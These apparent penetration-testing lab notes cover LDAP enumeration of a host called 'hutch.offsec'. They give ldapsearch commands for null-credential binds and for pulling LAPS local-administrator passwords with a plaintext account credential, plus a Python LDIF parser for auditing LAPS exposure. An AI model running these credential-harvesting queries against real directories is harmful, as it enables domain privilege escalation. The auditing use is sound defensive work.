LDAP - 389/636

Checking for null credentials

ldapsearch -x -H ldap://192.168.73.122 -D '' -w ''  -b "DC=hutch,DC=offsec"

Authenticated LDAP Query for LAPS password

Authenticated LDAP queries return a great deal of information. The ms-MCS-AdmPwd part of this command just filters the output so you see only the LAPS password.

ldapsearch -x -H ldap://hutch.offsec -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192'  -b "DC=hutch,DC=offsec" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
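
For auditing who can read LAPS passwords, this added example (not part of the original notes) parses the LDIF that ldapsearch prints, including folded lines and base64 `::` values. It lists which computer objects returned ms-MCS-AdmPwd to the bound account without echoing the passwords. The sample LDIF and the function names are constructed for illustration.

```python
import base64

# Constructed ldapsearch output (LDIF); names and values are made up.
SAMPLE_LDIF = """\
dn: CN=WS01,OU=Workstations,DC=example,DC=test
ms-MCS-AdmPwd: Constructed-Value-1

dn: CN=SRV02,OU=Servers,DC=example,DC=test
ms-MCS-AdmPwd:: Q29uc3RydWN0ZWQtVmFsdWUtMg==

dn: CN=A-Very-Long-Computer-Name-Used-To-Force-Folding,OU=Workstations,DC=exam
 ple,DC=test
ms-MCS-AdmPwd: Constructed-Value-3

dn: CN=PRN04,OU=Servers,DC=example,DC=test
cn: PRN04
"""

def unfold(text):
    """Join LDIF continuation lines (a line that starts with one space)."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines

def parse_entries(text):
    """Return one {lowercased attribute: [values]} dict per LDIF entry."""
    entries, current = [], None
    for line in unfold(text):
        if not line.strip() or line.startswith("#"):
            current = current if line.strip() else None  # blank line ends an entry
            continue
        name, _, rest = line.partition(":")
        value = rest.lstrip(":").strip()
        if rest.startswith(":"):  # "attr:: value" is base64-encoded
            value = base64.b64decode(value).decode("utf-8", "replace")
        if name.lower() == "dn":
            current = {"dn": [value]}
            entries.append(current)
        elif current is not None:
            current.setdefault(name.lower(), []).append(value)
    return entries

def exposed_laps(text, attr="ms-MCS-AdmPwd"):
    """DNs that returned the LAPS attribute; the value itself is not returned."""
    return [e["dn"][0] for e in parse_entries(text) if e.get(attr.lower())]
```

Every DN it reports for a low-privileged bind account is a computer object whose ms-MCS-AdmPwd read permission should be reviewed.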

CrackMapExec can also be used to pull this information, maybe even more easily: https://wiki.porchetta.industries/ldap-protocol

https://github.com/T3KX/Crackmapexec-LAPS

https://github.com/ropnop/windapsearch

https://www.geeksforgeeks.org/ldap-enumeration/
